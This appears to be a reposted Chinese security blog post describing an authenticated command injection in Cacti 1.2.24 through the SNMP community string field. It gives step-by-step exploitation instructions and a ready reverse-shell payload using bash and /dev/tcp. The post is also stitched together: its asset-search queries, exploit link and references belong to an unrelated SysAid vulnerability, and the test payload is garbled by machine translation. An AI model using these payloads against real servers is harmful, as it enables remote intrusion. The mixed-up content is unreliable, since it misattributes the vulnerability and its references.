Cacti 命令注入漏洞及利用方式

admin 2024年1月11日11:33:14评论28 views字数 1829阅读6分5秒阅读模式

漏洞描述

在 Cacti 1.2.24 中,在某些条件下,经过身份验证的特权用户可以在设备的 SNMP 选项中使用恶意字符串,执行命令注入并在底层服务器上获取远程代码执行。

Cacti 命令注入漏洞及利用方式

FOFA语句

fofa:body="sysaid-logo-dark-green.png" || title="SysAid Help Desk Software" || body="Help Desk software <a href="http://www.sysaid.com">by SysAid</a>"shodan:http.favicon.hash:1540720428zoomeye:app:"SysAid On-Prem Software"hunter.how:favicon_hash="5f30870725d650d7377a134c74f41cfd"

利用条件

  • 攻击者已通过身份验证(有账号密码或认证后的会话)。

  • 攻击者的权限允许管理设备和/图形,例如“站点/设备/数据”、“图形”。

  • 可以使用支持SNMP 的设备。

  • 可以使用 Net-SNMP 图表。

  • PHP 的 snmp 模块未安装。

漏洞利用示例

  • 前往“控制台”>“创建”>“新设备”。

  • 创建支持 SNMP 版本 1 或 2 的设备。

  • 确保设备具有包含以下一个或多个模板的图表:

    • “Net-SNMP – 组合 SCSI 磁盘字节”

    • “Net-SNMP – 组合 SCSI 磁盘 I/O”
      -(从模板“Net-SNMP Device”创建设备将满足图形先决条件)

  • 在“SNMP 选项”中,对于“SNMP 社区字符串”字段,使用如下值:
    民众’ ; 触摸 /tmp/m3ssap0 ;’

  • 单击“创建”按钮。

  • 检查 /tmp 下是否存在已创建的文件。

要获得反向 shell,可以使用如下所示的payload。

public' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; '

类似的漏洞可用于编辑现有的具有相同的先决条件、并等待轮询器运行的设备。可能需要使用不涉及 SNMP 的项目更改“可用性/可达性选项”部分下的“停机设备检测”字段的内容(因为恶意负载可能会中断与主机的交互)。

EXP代码

见 https://github.com/W01fh4cker/CVE-2023-47246-EXP

Cacti 命令注入漏洞及利用方式

参考链接

https://md5ol.com/211/https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-47246.yamlhttps://www.huntress.com/blog/critical-vulnerability-sysaid-cve-2023-47246https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notificationhttps://www.zscaler.com/blogs/security-research/coverage-advisory-cve-2023-47246-sysaid-zero-day-vulnerabilityhttps://github.com/W01fh4cker/CVE-2023-47246-EXP

Cacti 命令注入漏洞及利用方式

本文版权归作者和微信公众号平台共有,重在学习交流,不以任何盈利为目的,欢迎转载。

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。公众号内容中部分攻防技巧等只允许在目标授权的情况下进行使用,大部分文章来自各大安全社区,个人博客,如有侵权请立即联系公众号进行删除。若不同意以上警告信息请立即退出浏览!!!

敲敲小黑板:《刑法》第二百八十五条 【非法侵入计算机信息系统罪;非法获取计算机信息系统数据、非法控制计算机信息系统罪】违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。

原文始发于微信公众号(巢安实验室):Cacti 命令注入漏洞及利用方式

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月11日11:33:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Cacti 命令注入漏洞及利用方式http://cn-sec.com/archives/2215850.html

发表评论

匿名网友 填写信息